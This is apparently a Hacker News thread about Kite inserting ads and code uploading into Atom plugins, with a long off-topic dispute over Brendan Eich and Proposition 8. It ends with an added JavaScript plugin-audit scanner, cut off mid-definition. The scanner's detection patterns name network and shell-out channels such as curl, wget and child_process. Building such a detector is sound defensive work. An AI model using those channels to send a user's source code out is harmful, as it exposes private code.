For instance, now that I know, it would take a change of management and business model before I'd even consider running any of their code, and I'll be writing a Kite-detector for our code scanning tool this week.

There's a great quote from Kite founder 'alexflint in one of those earlier threads:

"our plan is to earn trust the hard (i.e. only) way: transparency, published policies, and a track record of good decision making."

Easier said than done, apparently.

Kudos to @mehcode for the fork [1]! And the author @abe33 for the apology [2]! I'm thinking, that @abe33 might not be responsible for this, but was "asked" by his employer (Kite) to do that.

Then, there are alternatives such as sublimetext/vscode, which have the minimap builtin...

Disclaimer: Not affiliated, I prefer n/vim anyways. This is a copy from my comment in the issue. Please read @abe33's comment [2] in the issue. This might explain a thing or two.
[1]: https://github.com/mehcode/atom-minimap-plus

[2]: https://github.com/atom-minimap/minimap/issues/588#issuecomm...

That's a pretty sorry excuse for an apology, in my opinion.

First, he focuses heavily on how much stress the backlash has caused him. Then he tries to paint it as a "misunderstanding" on behalf of the users. None of this strikes me as the behavior of someone taking full responsibility for their actions.

Further, I keep seeing people trying to justify his actions with the pathetic excuse that he was probably just doing as told by his employer. Sorry folks, that's not how being an adult works. There's a reason virtually every formal code of ethics stresses personal responsibility. Take, for instance, 8-b from https://www.nspe.org/resources/ethics/code-ethics

  Engineers shall not use association with a nonengineer, a corporation, or partnership as a "cloak" for unethical acts.
Or the very first point from http://www.acm.org/about/se-code

  Software engineers shall act consistently with the public interest. In particular, software engineers shall, as appropriate:
  1.01. Accept full responsibility for their own work.
Just because we're in the comparatively-"lower stakes" profession of web development, that doesn't mean we can use the sorry-ass excuse of "my boss told me to do it." Unless they held a gun to his head, he had a choice, and his choice should stick with his reputation for better or worse. Now his name is going to be attached to this dumpster fire of a PR mess because he didn't have the will or integrity to say no, and smart people within the community will have a very good reason to no longer trust his judgement, much less his future contributions.

Thanks for posting abe33's apology, hadn't seen it when I read about this issue last week. One of the more unnerving things about it was how he made this change without explanation months ago, nor did he explain it now. It must have been frustrating for him, as the plugin's original developer, to be dragged through this crap. He ultimately is responsible for his actions, but I wonder if he knew that subverting his own plugin would be a job requirement?

I can't imagine he would sabotage his own project for no reason, so most likely he got the job or some compensation in exchange for his cooperation and access to his repository, probably how they got python-autocomplete too.

Otherwise, if they offered the job with no conditions attached he'd be under no obligation to change his own personal projects for them.

Yeah, I was wondering if Kite had a deliberate strategy to inject themselves into popular IDE-plugins, and their hiring plan includes reaching out to such creators. It's not unthinkable that they would slip in such an obligation after the contract is signed. I mean, we're talking about a company that conspired to covertly slip in these dark-pattern ads into mainstream open-source plugins. Ideally, the minimap creator could have taken a moral stand and quit, but I imagine his work situation and prospects (being from Europe) are different than if he were a developer in the Bay Area.

This would actually be a smart and ethical strategy, if the changes were made in a way that they were opt-in and clear about what they were doing. Unfortunately it looks like they got greedy, and this is what happens when you dance the line: much easier to cross it.

While I could see how it can be done in a way that isn't outright unethical, it still strikes me as 'wrong' in the sense that it betrays my expectations of how open source works and relates to for-profit endeavors.

There's no implementation I can think of where I wouldn't feel icky about this, even if the 'Kite update' did absolutely nothing without turning it on explicitly through some setting that I actively have to look for (so no 'would you like to opt-in' screen at all).

From @abe33's comment:

  Secondly, even if it may seems to come late, we've heard you and decided
  to revert all the changes related to the python links feature. The next
  release will no longer show anything. I'll also make sure that the relation
  between Kite and the minimap package are as clear as possible. I've been an
  employee at Kite for over half a year now and this plugin is now
  officially maintained by Kite.

Even if there was nothing contractual, being asked to do something like this by the CEO after starting a new job would make anyone feel pressured to play along and not make a bad early impression.

fine print my friend...fine print...i.e. giant unreadable employment contract.

only speculating but truly possible.

  > It must have been frustrating for him, as the plugin's
  > original developer, to be dragged through this crap.
Completely agree.

Then, this sets a precedent. It reminded me of Google injecting some binary code into Chromium [https://news.ycombinator.com/item?id=9724409]. However, we have a single person here. I can wholeheartedly imagine, that this can cause quite some stress. Also, it could have happened to many, I think...

Edit: I'm happy about the discussion here. At least, this won't happen again, anytime too soon.

I've tried Kite twice now. Once when it first launched, and once again when I installed autocomplete-python and it persuaded me to give it another go.

So far I have found it utterly unconvincing to the point of near uselessness. It rarely finds anything intelligent to say about my code, and gives a significantly worse view of documentation than Dash (for which I have a hotkey bound for near-instant lookup).

On top of that, I found Kite to use significant resources, there's no way to inspect what it's uploading so no way to ensure you aren't uploading things you don't want to, and the second time I tried it the UI was filled with dark patterns and I found it quite difficult to uninstall (I reverted to just trashing all the files I could find relating to it).

I paid I think $79 for a year of Kite-pro and frankly, so far it is pretty useless. That said, it has permissions and settings to whitelist which folders on your computer can be indexed. Then, the settings page states that if you remove the directory from whitelisting then "any directories removed here will also be removed from Kite servers." Of course, that doesn't mean they will actually remove previously indexed data. Overall, probably this is a product that I would not want my dev team to install.

I'd ask for your money back. Installing Kite left me with a really bad after-taste, but at least I assumed that if I'd bought into it, it would do as advertised.

This is the minimap fork:
It is a featured[1] Atom package, which may point to whom GitHub is endorsing in this issue, though we could see a more direct response from them regarding both minimap and autocomplete-python.

After reading sadovnychyi's reaction[2] to the autocomplete engine selection screenshot, I think forking is also the only remaining step for autocomplete-python.

[1] https://atom.io/packages

[2] https://github.com/autocomplete-python/autocomplete-python/i...

> “Most users who install autocomplete-python close the engine selection prompt, which results in not getting Kite or its benefits”

This type of entrepre-narcissism has to be shut down hard. How deluded does somebody have to be to imagine that putting a confirm-shaming dialogue in an open-source tool is not Advertising?

They're not deluded at all, it's just damage control. If they didn't believe it was advertising, it wouldn't be in the tool in the first place.

Every interaction I have with these kind of guys proves to me that they deep down believe their own BS and that they are actually blind only to their own actions. I consider a delusion much more dangerous than a malign stratagem.

Yea, it really confirms this as a corporate strategy.

I just uninstalled Kite.

It's a real shame as the service was good, but nothing is good enough to justify advertisements in my work-space. The fight against distraction is hard enough as it is without having to think carefully about where I'm clicking due to dark-pattern UI.

So how was your company okay with you uploading the company code to Kite's servers?

He didn't mention using it under a company. I was tempted to use this for personal projects as I don't care where my code gets uploaded, it's all on github anyways.

The reviews above made me reconsider.

L'état, c'est moi

I'm a freelancer, and my code is open-source anyway.

PSA: I removed the whitelisted directory from my local install of Kite and then uninstalled the application. Logging into https://kite.com/settings/files still shows my machine and all of the synced files.

I still had to manually purge my machine and files from that page.

If you think your files were removed, check again.

Extra PSA: I deleted my files from that page a few months ago and they have now reappeared. (See my other comment.)

I would recommend emailing them to delete your account and data, including backups and so on.

Hi, Kite founder here. If you uninstall right after removing the whitelist directory then the removed files may not have been synced to the server before the uninstall, particularly if you have a lot of files on your machine. We will address this by adding a "remove all whitelisted directories and log out" link to the local settings.

Something different was likely happening in bfirsh's case (sibling comment). If you delete the files from the kite.com/settings/files page but Kite is still installed then they will get synced up again. The most fail proof way is to uninstall and then wipe files from kite.com/settings/files. We will make the wipe files link log Kite out on that machine.

Sorry about the edge cases. We've been working on it, and will continue to do so!

It's nice this is getting more response today - my submission yesterday got no comments.

I almost spit my coffee out when I learned about this (as I'm a minimap user who had no idea this was going on). Not a fan of these shady practices - completely breaks the trust between package maintainer and users.

here, have an upvote -- on me

I think we need a swift and damning response to this. I'd rather have an even worse walled garden than the Apple 'App Store' than deal with having to worry about my source code getting stolen to be used by some stupid cloud service. I don't even want data collection in my text editor; maybe from the vendor it's acceptable but not N times for each plugin. I now feel compelled to vet the network usage of any plugin I install.

Thanks, Kite. I'll make sure to remember this in case anyone ever considers your service.

Agreed. Also this should be the kind of stuff that gets the founders and employees blackballed in the industry as well.

Completely morally bankrupt. All of them.

Just like installmonetizer and all those associated with them, right?

Silicon Valley/the broader tech scene is going to look pretty empty if we do that to every employee of every company that has done shady stuff.

You say that like it's a bad thing.
Let's not make this a witch hunt. Yes, the company should be ostracised, but don't ask for every little person remotely involved with them to pay the price of a stupid lead decision.

I don't know much about this particular case, so I don't have an opinion on the comments above, but the argument that employees shouldn't be punished for participating in an unethical for-profit scheme doesn't really make sense to me.

Well, there is also the question of actual participation: Let's say [A]dam thinks they're not getting enough data and had this stupid idea to fix the problem, bought a bunch of repos when he had the chance, and told programmer [B]en to patch this in, while [C]hloe in another room is working on the website or tweaks the ML algorithm. How much is she at fault and involved here? What about [D]elilah and [E]ric in Support? Blaming them all individually and equally harshly for being associated with [A]dam is not really justifiable.

Completely agree, it's the classic Nuremberg defense.

This kind of polarised thinking doesn't really work - usually you don't have a choice if the entire system turns because it happens relatively fast and not all implications are completely clear to you in the beginning, and usually the system will also just plain lie to you to appear much less destructive than it is. Also: Then every single American is at fault for Trump? I mean, they let it happen, right? So they must take responsibility.

Collective punishment and guilt by association are morally reprehensible but getting everyone off the hook is equally wrong irrespective of their rank in the food chain.

I am not saying that you necessarily advocated for this position in your comment but I just felt the need to make my point clear.

Of course you can't paint all the employees guilty and leave it at that, that's not what the Nuremberg defence means. If an employee knowingly acts malicious under orders from their boss, then they are just as accountable.

To be clear I'm not advocating a witch hunt, but saying all employees are innocent because they were following their bosses orders is a Nuremberg defence.

I know - my comments were more about the initial demand, and it's a little bit of a misunderstanding that people immediately compared it to me trying to invalidate the Nuremberg trials.

If programming were an engineering profession, each engineer would be responsible for ensuring that the code they worked on was ethical at the potential cost of their license. It isn't of course, but there is nothing unusual about demanding personal responsibility for social implications from individual employees like that.

What makes you think that the coverage of this event is unbalanced and vindictive?

I think that we all agree that this event should be documented and reported objectively, as it's newsworthy, proved by this very article here, and it deserves a mention in a subsection on their Wiki entry.

The effectiveness of this line of defense hasn't improved since the Nuremberg Trials. And the directly responsible committers are not "every little person".

Am I the only one alarmed by how quickly this comment chain is escalating?

I hope so. This is the kind of thing where a swift and somewhat brutal response is necessary, I feel. I wouldn't necessarily go as far as digitally tar-and-feathering all the developers involved (I've made mistakes myself that were a result of thoughtlessness), but the people in charge should be sent a message that this is not acceptable, and quite frankly I think public shaming/blacklisting is entirely justified when it comes to them.

Yeah. But this is the thread where two proponents of "sending a message" are using the Nuremberg Trials as a case-study.

So people should quite obviously chill a bit. Even if the pitchfork-people in this thread only wish bad PR upon this company, thousands of people are reading these threads, and it only takes one slightly unstable personality to think he'll be a hero for the community if he publishes the CEO's honeymoon photos (or whatever).

Also, to keep this in perspective: they did nothing illegal. Changing the rules is a much better course of action than vigilante justice if you believe this to be wrong.

Is publishing honeymoon photos illegal? (I'm presuming nothing compromising.) If the photos were taken in a public place, then they are legal, and then therefore no harm done, right?

It depends on which country you are talking about.

I wouldn't make so much fuss for some changes that:

1. They have every right to make (it is open source and they have write access to the repo)

2. I have every right to either fork and reverse, or completely stop using.

I wish our world worked like that, but unfortunately blackballing requires that the median participants of a group have some sort of moral compass.

I gave up hope for such things after seeing staff, investors, and speculators tripping over their own dicks to invest in Brendan Eich's latest venture (Brave) and its ICO, with full knowledge of his revolting and public bigotry against gay people.

Money trumps morals, it seems.

The case with Brendan Eich's past donations is a troubling one, but I also found the way he was forced out of Mozilla questionable and also keep in mind that despite having this black mark on him, he's done many good things too and is not known to have done anything oppressive against anyone since then, yes troubling, but I also think that every person, even less accomplished one, has something they should be ashamed of in their past, so I don't agree that we should hold this one incident against him for the rest of his life, unless he does something to warrant it.

It's free speech whether you like it or not and I don't think your tactics of playing hardball with Eich or any other skeptic of gay rights would win him over to your cause, as it foments feelings of resentment and discontent and would likely lead to counter-productive results.

"It's free speech whether you like it or not"

So were the people calling for him to resign.

But that's the exact same situation, right?

Kite's business model is just as legal as Eich's free speech money. But people still think it's wrong, and so they try to find ways to discourage others to act similarly.

I'm not completely sure if such punishment works, but I'm pretty sure that if it works for Eich, it will work for Kite, and vice versa.

It's not the same thing.

Kite's business model is an attack against open source, thus pertinent to tech.

Eich's view on marriage is completely unrelated and attacks on his professional career for this are abhorrent and juvenile and should be condemned rather than encouraged. Even if you disagree with Eich's stance (which for the record I do).

Did he call for violence against homosexuals or is this just a strawman?

I must admit that I am not well acquainted with all the facts of this controversy, just the basics and I don't recall him calling for violence.

The government enforces the law through the threat of violence.

This is a very low effort flame bait attempt, and HN is not the place for flamewars.

I disagree that it's flamebait, but I do think this is all off-topic. But I just can't keep my dumb mouth shut when someone says that enforcing one's private religious views on others via the government is just fine.

A person's private religious views are no reason for a professional witch hunt. That is well beyond the pale of acceptable, and so is your comment.

There's no reason to turn this into a less reasonable version of a McCarthy type inquisition. Once we start up with that nonsense it doesn't lead to a good place. No matter how strongly you feel you are right.

To which "professional witch hunt" are you referring? Are "private religious views" still private when you are using the government to enforce them on others? Is a CEO who spends considerable sums of his own money to do harm to his own employees for no benefit fit to remain CEO? Are users not allowed to demand good behavior from the companies they support?

No. Users are not allowed to dictate private religious views to people who work for companies. That's unreasonable.

Boycotting a company because you don't like the political views of one of its employees on the other hand is just silly.

What exactly is your issue with separating personal and professional life? Do you feel you should be professionally attacked or your company boycotted because you (presumably) support gay marriage and some people feel that's wrong? No, of course you shouldn't. You should have a right to vote, support, do whatever in this regard and it shouldn't affect you professionally.

Look, I personally support gay marriage. But this kind of behavior on the part of the "crusaders" is outrageous. It really is.

I think it's legitimately a fascinating discussion point! Thank you for engaging me on it instead of freaking out. While we disagree, I do understand where you're coming from.

Again, the issue was not his "private religious views." The issue was when he used his power and influence to enforce those views on other people who did not subscribe to them. The line is crossed when one tries to enforce their personal beliefs on others via the government. It's not about politics--I think there are many things in politics about which reasonable people can disagree--it's specifically about enforcing a religious viewpoint on other people through the government. I don't force my religion on others; I think it's reasonable to demand that others do the same, and to enforce that demand through the means available to me, which may well include a boycott.

Sure likewise. I mean, no hard feelings but go all the way up the chain to parent. He suggests Brave browser shouldn't get funding (and people shouldn't use it?) because at one point Eich gave a couple thousand bucks to a (failed) campaign to prevent gay marriage from becoming legal.

And who cares? The question should be is the browser any good.

Do you think people should call his place of employment and claim they aren't going to use the product unless they "fire the pervert"? It's ridiculous. It really is. And I'd be saying exactly the same thing if the relationship were switched.

The Proposition 8 campaign was actually successful in re-prohibiting gay marriage in California for about four years before it was overturned, meaning four years of legal limbo for already-married couples and four continued years of second-class-citizen standing for gay couples looking to get married. It also pushed out some incredibly offensive TV ads, claiming the marriage equality movement wanted to use schools to turn children gay and other nonsense. You can understand how someone affected by that proposition, and the decades-long fight before it, might not be so quick to say "oh, you rascals, let's let bygones be bygones;" even if marriage was legalized in the end.

I honestly don't know where I stand on Brave. I hate our current ad-supported world, and it's an interesting alternative to that. On the other hand, I loath Eich and have no interest in supporting him financially after what he has done. Mostly I just stay silent; my feelings aren't strong enough to actually oppose other people using it, but I won't use it myself.

Note that I never said anything about Brave one way or the other. My response was simply that Eich's donation was not simply "free speech," it was a sincere and successful effort to enforce his personal religious views on others, and that it's perfectly fine to oppose that behavior.

You sure post a lot about me on HN (search here: https://www.google.com/search?q=site%3Anews.ycombinator.com%...) for someone trying to "stay silent".

From my comment at https://news.ycombinator.com/item?id=12721891 (linked from https://news.ycombinator.com/item?id=13411986):

``Prop 8 would not and did not "nullify" any marriages licensed by the state in the middle of 2008. See http://www.sfgate.com/bayarea/article/Prop-8-not-retroactive...

Retroactive or ex-post-facto law is unconstitutional. I am a big fan of this principle. It protects all of us.''

Now, how about you stop the hate ("I loath [sic] Eich")? I do not hate you.

> I do not hate you.

You can use whatever word you like, but you used your money and influence to cause incredible amounts of harm to your fellow citizens and previous employees through your bizarre need to use the government to enforce your personal religious views on other people. I don't know the right word for that kind of behavior.

So you concede your assertions about "legal limbo" were false -- good. That's progress.

Moving on to assert "incredible amounts of harm" as caused by me among a majority of Californians who supported both Prop 8 and the prior work of Mark Leno et al. on Domestic Partner Law, California's form of civil unions -- which as https://en.wikipedia.org/wiki/Domestic_partnership_in_Califo... says, and as Leno said at the time, ensures equivalent positive rights under state law for all -- is nonsensical.

We were allies when we supported civil unions. Obama was on the side of civil unions in 2008, and likely strategically lying that he believed marriage was one man and one woman. Then the goalposts moved, and incredible yet heretofore invisible harm was being done? Nonsense.

Fixating on "religion" is also nonsense. Theft is against the law. Major religions teach that theft is sinful. Does this mean religious people are enforcing personal views on other people? Of course not. Atheists (I know some; neo-Darwinian evo-biologists) supported Prop 8. People who didn't like the Foucauldian agenda behind the whole thing, or the judicial overreach, or mayors like Newsom overreaching, supported Prop 8. For many and usually coherent reasons, religious or not.

It shows either ignorance or ill will to dismiss both group diversity of thought and individual integrity of thought by labeling views you dislike as "religious", and therefore somehow illegitimate as the basis of action in the public square. Frankly, it is un-American.

You are entitled to your own opinions, as Daniel Patrick Moynihan quipped, but not your own facts. The fact is Californians including me who supported Domestic Partner Law did not do "incredible amounts of harm" up to May 2008. We did not suddenly start doing harm in June 2008 when Prop 8 got on the ballot. We did not do harm when the majority passed it.

Federal law, DOMA -- an unconstitutional power grab against the states by Congress and a pandering president -- caused hardships for Domestic Partners in California, but Californians could do nothing about that Bill Clinton era law.

As my search link shows, you've been calumniating me on HN for years, while trying unsuccessfully to stay silent on the topic. I'm not optimistic you'll stop now, but that search also shows I've tried engaging in good faith. Here I am again. Instead of silently dropping refuted assertions and moving the goalposts, e.g., to vague "incredible amounts of harm" imponderables, how about making an explicit statement of whom I harmed, how I harmed them, and how I can make amends.

The anti-gay community has a long, long history of belittling and harming gays[1,2]. Prop 8 was a continuation of degrading behavior towards gay people. Advertising claims that gay people want to harm or abuse children directly leads to anti-gay sentiment, which leads to closeting, bullying, and abuse. The campaign you donated to aired these kinds of advertisements[3] and the proposition itself was a direct attempt to maintain gays' second-class citizen status.

I do want to sincerely apologize if I've been misrepresenting your viewpoint. If I have, it was unknowingly. I assumed it was religious, because that's by far the most common objection to it. In all our years of sparring, you still haven't explained why you're opposed to gay marriage, to my knowledge. You always dance around the issue. If you tell me that it isn't based in religion, then I apologize and will immediately stop making that claim. But then what is it? If you're not actually opposed to gay marriage, but rather something like judicial overreach, was the continued harm to gay people worth whatever point it is you wished to prove?

> how I can make amends.

I can't speak to others. For me personally, an apology for supporting the campaign and a statement in support of gay marriage would shut me right up.

[1] https://en.wikipedia.org/wiki/Suicide_among_LGBT_youth

[2] https://en.wikipedia.org/wiki/Anti-LGBT_bullying

[3] http://www.slate.com/blogs/outward/2014/04/04/brendan_eich_s...

(Did you miss the "Update, April 23, 2014" at bottom of [3]?)

I never bullied anyone, so leave that out. Be careful arguing that I'm responsible for others' actions due to systemic problems and biases. That fallacious line of argument cuts in many directions.

Your whole approach, asserting religion only and as if illegitimate, asserting incredible harm ascribed causally to me personally, then moving on after rebuttal without any amendment to your assertions, shows ill will. I'm not going to "dance around" anything with you, and we are nowhere near a common understanding of all our priors.

The best I hope for is try to find common factual ground, which we are doing, slowly.

However, if you can only keep assuming your conclusions and smearing me by association with groups or people I didn't and don't support, I'm out. If you see no way for civil society to function without all the dissenters -- religious or not, we are many -- toeing your line and apologizing for their heresy, then we are definitely done. We can agree that "Error has no rights" and stop now.

I may not agree with you on everything you stand for (or against) but I feel for your position the more I read comments that speak ill of you.

If nothing else, these people come off as sociopathic and it makes me wonder if they are in opposition to you because they feel something immoral has been committed or simply because they just want to let out their hatred into the world.

Why not both? Jonathan Haidt, http://righteousmind.com/, goes into depth with moral psychology on why it feels good for many to vilify, call out, hate-mob, etc., and why we're seeing more such strife in the US, e.g., on campus. Recommended.

I had a response all typed up, but I wiped it, because I'm being unproductive by trying to argue. I should be trying to understand.

My viewpoint is that the only reason to oppose gay marriage is because you believe that gay relationships are inferior to straight relationships. Can you please explain to me a reason to oppose gay marriage other than that? You listed a few earlier:

> People who didn't like the Foucauldian agenda behind the whole thing, or the judicial overreach, or mayors like Newsom overreaching, supported Prop 8.

I don't know what "Foucauldian agenda" means. Sorry.

"Judicial/Newsom overreach" don't make sense to me in the context of a public referendum. These people voted against something they wanted just to prove a point about something else(?); and then what, they were going to vote in favor of it again sometime in the future? Okay, but that's pretty baffling behavior.

I just have a hard time believing anyone in support of gay rights would choose to vote against gay rights and support anti-gay organizations. Maybe you can explain this more for me.

"These people voted against something they wanted" -- no, people objecting to judicial and mayoral overreach voted to override that overreach. See https://news.ycombinator.com/item?id=12721928 on judicial restraint. I'm baffled you got my point exactly backwards, so pausing here.

Ok. Understood.

But people have all kinds of ideas about what constitutes "proper and fair". Some people feel differently about marriage and being gay than you do (or I do). They might come here and argue about perversion and degradation of society and what their kids are exposed to. And what can and can't be tolerated as far as behavior. And how marriage is such and such and doesn't apply etc. etc. And they feel every bit as strongly about it as you do. This isn't a wacky fringe view (yet) and it isn't considered "discriminatory" by the people professing it.

As far as I know Eich doesn't condemn gay people for being gay. He just apparently has certain views on what constitutes marriage. And he isn't alone in these views. I don't agree. You don't agree. The Supreme Court doesn't agree. But the public crucifixion of the guy's professional work because of these beliefs (which as far as I know he kept private) is to me 100 times worse than the views he holds. And it's a dangerous stance to take. We've been here many times before. Moral crusaders (of all stripes) out to improve the world who do little but cause destruction. At some level we have to accept not everyone shares our backgrounds or political beliefs and work with this fact in a constructive, civil and reasonable manner. It's part of becoming an adult in a multicultural society.

I appreciate you aren't trying to knock his work; that was OP. My only complaint is your original over-the-top rhetoric; other than that, fine, I understand you have a different view than Eich. But you can dislike an idea a person has without personally hating the person for having it. And that is the right thing to do.

I think for quite a few people (including myself) it wasn't primarily about 1) his personal views being disagreeable to us, and/or 2) him 'expressing' these views through a donation, but rather 3) him being CEO of Mozilla.

I'm still not certain whether I agree with what happened entirely, but calling it ridiculous is a bit of a stretch.

Being in the position of CEO gives you many powers and perks, and I think it's perfectly acceptable that it also gives you responsibilities that may include 'not being controversial'. I'd say this is especially the case when you're CEO of a very large, important, and well-known non-profit.

Basically, it's the whole 'with great power comes great responsibility thing'. People in positions of power can be held to standards that don't necessarily apply to everyone else.

I completely understand if people disagree with this position, but it's far from ridiculous.

(and of course I can't speak for those who do feel that aforementioned reason #1 and #2 are enough).

Oh please, Brendan chucking Javascript together has caused more pain than his questionable funding of certain interests.

Are you serious? Eich wrote it for Netscape in 10 days. If you want to blame anyone, blame those at Netscape who only gave him a week and a half. He did a phenomenal job given the situation.

If we have to lynch somebody for JS, I would prefer to start with the IE6 development team.... I still have PTSD /s

Thanks for mentioning Brave. I've really been enjoying using it as a browser. Typing this response on it right now. Really hope it gets some traction as it's a cool idea.

I think your claim of "bigotry" is a bit overstated and I don't really care about people's political views in this context.

Google introduced and normalized the spyware/adware business model. Nothing but fawning adoration from programmers.

Microsoft copied the model for operating systems. Token resistance from programmers.

Kite copies the model for programming tools. Too late, programmers.

The problem is not that they built some product and monetized with ads. The problem is they injected themselves into a product they didn't build. Worse yet, they're open source projects.

If you can't see the distinction between this and the examples you mention, you really don't qualify to make sarcastic comments.

Exactly. And don't forget about the proliferation of the internet-of-shit devices, which are blasting everything they can learn about your home network to every company involved.

HN is specifically geared towards people who make a living coding things in the new "surveillance economy." This particular example (to go along with the dotnet command line issue) is just a difference in degree, not kind. They're mad that someone else is abusing their trust and privacy.

Welcome to the party, pal!

Let's not forget the "exploit open source/free labor" component of a key demographic of HN's audience.

I'm pretty sure that the only OSes that don't have adware/spyware in them at this point are some Linux distros (maybe) and Unix.

There are tons of attack vectors that spyware can enter linux through :)

"Unix" isn't really a specific OS. So yeah, there's probably no spyware in it.

By Unix I mean FreeBSD, OpenBSD, NetBSD.

> Nothing but fawning adoration from programmers.

That is a narrow way to look at things and is not the full picture. Plenty of people protested and still protest Google's unethical business practices.

Brand power! I get totally nauseated every time tools/frameworks/programming languages get adopted just because they have the Google brand on it, when there are perfectly better alternatives.

Holy shit that 'apology' is a steaming pile of crap. This guy is actively subverting not one but multiple open-source projects and he responds with some pathetic crisis-management sob story and an 'oops, sorry'?

He did revert the minimap changes. That's more than just saying "sorry".

But I'm waiting for autocomplete-python to be changed, too...

It may really be a sorry, but also some damage control too.

And they are sorry they got caught, not sorry they did it. As is tradition.

Open source is very vulnerable to manipulation. Some years ago, I spent some time trying to understand the PAM LDAP module on Linux (PAM is used to enable external authentication, so it's critical code). I found it to be completely impenetrable. We take such components for granted, but if someone could inject malware into such code, it could be catastrophic.

Not to mention it must be trivial for a large and determined adversary to subvert Debian, Arch or other distributions' packaging process, for example by getting a "sleeper" rogue developer in there. As someone into security and using open-source systems exclusively, it would be somewhat embarrassing to become a security problem yourself that way.

I don't distrust Linux distributions' respective security guidelines; but it can't be that hard to find a loophole in community-driven system/software development, and the damage would be substantial if a popular Debian package had been subverted and gone out with updates.

The same statement could be made about any organization. If you get a sleeper agent into Apple, Google, Microsoft, whatever... There is a certain amount of goodwill we rely on in this world.

It's not quite the same thing as, AFAIK, the debian project doesn't have the same power as an employer does to do background checks before hiring.

There's a significant level of risk around open source projects changing hands, something which may be invisible to the users of those projects, especially as they become more heavily used and therefore more tempting targets for attackers.

Employers only have that power because you grant it to them. Of course you don't have a lot of choice if you want the job.

In theory, Debian or any organization could do the same background check, but is that the best use of their limited resources? And would they want to do it anyway given the ideals of the general OSS community?

Sure, my point was companies do do that checking and Debian doesn't do that checking, so from the perspective of this risk, it would be harder for an attacker to do this to a large corporate like Microsoft than it would to do it to an open source project like debian.

But companies wouldn't give commit access to somebody they just "hired" over the internet that "wants to help", and they'd (hopefully) have multiple layers of code sign-off before it ends up in the repository. Having worked in PCI-DSS environments, it would not be easy to get code into production without anybody else noticing.

Open-source projects often have random people "from the internet" working together with a great deal of individual autonomy (authority doesn't go down well when you are contributing for free). This ad-hoc style works well for open-source development, but it does make some kinds of code/system subversion a lot easier and we'd do well to keep that in mind.

Besides, I'm into open-source and security exactly because I don't want to rely on the goodwill of Apple, Google and Microsoft. ;)

Most large software companies do continuous scans of their own source code looking for potential backdoors. Obviously this is not guaranteed to catch such attempts but definitely necessary in the current environment where Zero days are so valuable.

Most of the tools I know in this space look for known issues.

OSS teams could spend the time and money running these tests, but this seems like a good area where governments and companies can step in to help.

Exactly, no organisation is immune to sabotage.

I'm pretty sure this is somewhat unique to the history of pam_ldap and its stewardship by PADL Software compared to other PAM modules; its dense nature encourages commercial engagement for those who care enough to know how it works or want to use it for their own purposes. They're not motivated to make it easier to understand (i.e., for outsiders to contribute to or maintain).

pam_sss is easier to understand and its functionality expands upon it, but it was a redesign.

This is really fascinating - I agree that PAM LDAP appears to be especially obscure compared to other modules.

I think that is an unavoidable consequence of the openness.

Honestly, I feel that at the very least the core team behind Kite should be held accountable for what they're doing. I'm not arguing in favor of an all-out witch hunt, but in the context of developers doing their development thing this kind of behavior should have consequences that potentially might include 'black-listing' at least the higher-level people behind it that thought this was a good idea.

In short: A startup is taking control of open source editor plugins relevant to their product.

I admire their cleverness.

If it were me: I'd create an extension interface for completion libraries to accept third-party plugins. I'd stop at putting third-party stuff in by default. A sufficiently good plugin API for python-autocomplete shouldn't require it even to know about Kite.

That said, I don't think Kite should be disallowed. If they have a secret sauce that they think can empower completion plugins, give them an API to plugin to.

It's not in the spirit of open source to shut the door on proprietary solutions (IMO). Transparency should be paramount. Normally most Linux users opt-in to using proprietary/blob software/drivers one way or another anyway. Open source projects routinely maintain relationships with vendors (NVIDIA, Intel). It doesn't necessarily mean evil is at work.

Though, as someone who's struggled with the performance and reliability of completion tools, I don't know if I'd personally opt to outsource that functionality. I'd wait and see if our current tools get better.

So, what prevents any Atom package from being silently taken over and turned into a private code Hoover? Is there anything in Atom's packaging APIs that ensures plugins that can read source cannot also access the network without permission?

As far as I know: nothing yet. It hasn't been necessary. I don't think people even thought about it. But I think now it's going to become an ordeal...

This is why we can't have nice things. As you say, such limits weren't necessary - because people in the community weren't assholes. Now, thanks to Kite's abuse, somebody will have to implement a permission system to editor plugins...

That is probably a long time overdue though in the case of editors like Atom.

Simply put; if some unethical corporation can hijack projects like this, then a much more malicious actor can as well. One that isn't as easy to detect, and does much more harm (like harvesting any code or input that looks like it could be private data such as credit cards numbers, SSNs, email and passwordish strings found near each other, etc.).

Extensions, plugins, and what have you are cool, but straying outside of the fairly monitored confines of your OS's controlled packages carries a risk.
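The question raised above (can an Atom package that reads source also reach the network unnoticed?) has no runtime answer in the editor itself, so a pre-install audit is the pragmatic check. Below is an added example, not code from the thread, from Atom or from Kite: a heuristic scanner that flags a package when the same bundle both reads editor/source contents and uses outbound network APIs. The capability patterns and the sample package are constructed for illustration; the Atom API names used (atom.workspace, editor.getText) are real, the rest are Node/browser APIs.

```javascript
// Heuristic audit of an editor-plugin bundle: flag packages that combine
// "reads source" capabilities with "sends to network" capabilities.
// This is a review aid, not a sandbox: obfuscated or dynamically built
// calls evade it, which is why a real permission model is still needed.

// Capability -> regexes matching calls that grant it.
const CAPABILITIES = {
  readsSource: [
    /\bfs\.(readFile|readFileSync|createReadStream)\s*\(/,
    /\.getText\s*\(\)/,                              // Atom TextEditor#getText
    /\batom\.workspace\.(getActiveTextEditor|getTextEditors|observeTextEditors)\b/,
    /\batom\.project\.getPaths\s*\(/,
  ],
  sendsNetwork: [
    /\b(https?|net|tls)\.(request|get|connect|createConnection)\s*\(/,
    /\bfetch\s*\(/,
    /\bnew\s+(XMLHttpRequest|WebSocket)\s*\(/,
    /\bchild_process\b/,                              // curl/wget via shell-out
  ],
};

// Scan one file line by line; returns [{file, capability, line, text}].
function scanFile(filename, source) {
  const findings = [];
  source.split("\n").forEach((text, idx) => {
    for (const [capability, patterns] of Object.entries(CAPABILITIES)) {
      if (patterns.some((re) => re.test(text))) {
        findings.push({ file: filename, capability, line: idx + 1, text: text.trim() });
      }
    }
  });
  return findings;
}

// Audit a package given as {path: source}. Verdicts:
//   "review"       both capabilities present (what a code-exfiltrating plugin needs)
//   "network-only" talks to the network but never touches source
//   "reads-only"   reads source but has no network path
//   "ok"           neither
function auditPackage(files) {
  const findings = Object.entries(files).flatMap(([f, src]) => scanFile(f, src));
  const caps = new Set(findings.map((x) => x.capability));
  let verdict = "ok";
  if (caps.has("readsSource") && caps.has("sendsNetwork")) verdict = "review";
  else if (caps.has("sendsNetwork")) verdict = "network-only";
  else if (caps.has("readsSource")) verdict = "reads-only";
  return { verdict, findings };
}

// Constructed sample: a minimap-style renderer plus a "telemetry" module
// that posts the buffer contents to a remote host. Only the second file
// introduces the network capability.
const SAMPLE_PACKAGE = {
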